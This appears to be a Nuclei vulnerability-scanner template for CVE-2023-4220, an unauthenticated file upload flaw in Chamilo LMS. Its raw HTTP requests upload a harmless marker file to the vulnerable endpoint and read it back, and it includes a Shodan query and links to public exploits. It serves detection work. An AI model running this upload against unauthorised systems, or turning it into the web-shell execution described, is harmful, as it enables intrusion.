id: CVE-2023-4220 info: name: Chamilo LMS <= 1.11.24 - Remote Code Execution author: securityforeveryone severity: medium description: | Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. reference: - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit - https://github.com/charlesgargasson/CVE-2023-4220 - https://starlabs.sg/advisories/23/23-4220/ - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-4220 cwe-id: CWE-434 epss-score: 0.00163 epss-percentile: 0.52876 cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: chamilo product: chamilo_lms shodan-query: "X-Powered-By: Chamilo" tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload variables: filename: "{{rand_base(10)}}" num: "{{rand_int(1000, 9999)}}" http: - raw: - | POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3 --------------------------SwxF5rRaZb4lETWlpulXn3 Content-Disposition: form-data; name="bigUploadFile"; filename="{{filename}}.txt" Content-Type: application/octet-stream {{md5(num)}} --------------------------SwxF5rRaZb4lETWlpulXn3-- - | GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and # digest: 490a0046304402202ba2802508b1a8106520e47642aee8d4b207bacca790fa88de82191931bd865c022022060f23d393a03776c518d9167dcf9508a0a32d8b2e7ff199d1d8a0c670f3f5:922c64590222798bb761d5b6d8e72950